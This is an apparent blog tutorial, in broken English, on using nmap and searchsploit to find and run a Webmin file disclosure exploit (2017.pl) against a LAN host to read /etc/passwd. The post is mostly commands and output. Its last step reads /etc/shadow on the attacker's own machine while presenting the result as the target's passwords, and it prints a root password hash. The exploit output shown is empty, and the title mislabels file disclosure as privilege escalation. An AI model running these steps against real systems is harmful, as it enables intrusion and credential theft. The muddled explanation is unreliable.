Senin, 30 Januari 2012

Privillege Escalation


1.scan dengan nmap to get the information
root@BT:~# nmap -v -A 192.168.0.112

Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112

From the information above, We got 5 opening port, thoose we can use to the next steps
We can try open 192.168.0.112 : 10000 in the web browse


2. in the step use exploitdb :
  root@BT:~# cd /pentest/exploits/exploitdb/

3.type ls to know directory
  root@BT:/pentest/exploits/exploitdb# ls
  files.csv  platforms  searchsploit

4. the next write ./searchsploit webmin  to know file webnim
  root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
  Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

5. copying file 2017 perl with type cp platforms/multiple/remote/2017.pl ~
  root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

6. quit to pentest with type cd
  root@BT:/pentest/exploits/exploitdb# cd

7. see the value folder home
  root@BT:~# ls
  2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
  Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
  download                         NessusReport27.rtf  NessusReport65.rtf  workspace
  galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
  galau.txt                        NessusReport35.rtf  NessusReport67.rtf
  IS2C                             NessusReport40.rtf  NessusReport70.rtf
  Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

8. see file 2017.pl
  root@BT:~# perl 2017.pl
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd
  root@BT:~# perl 2017.pl 192.168.0.112 10000
  Usage: 2017.pl <url> <port> <filename> <target>
 TARGETS are
 0  - > HTTP
 1  - > HTTPS
 Define full path with file name
 Example: ./webmin.pl blah.com 10000 /etc/passwd

9.Open the encryption of password and user name, with type:perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------

 -------------------------------------

10. Show all the username and password in shadow folder, type : cat /etc/shadow
   root@BT:~# cat /etc/shadow
   root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::




Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)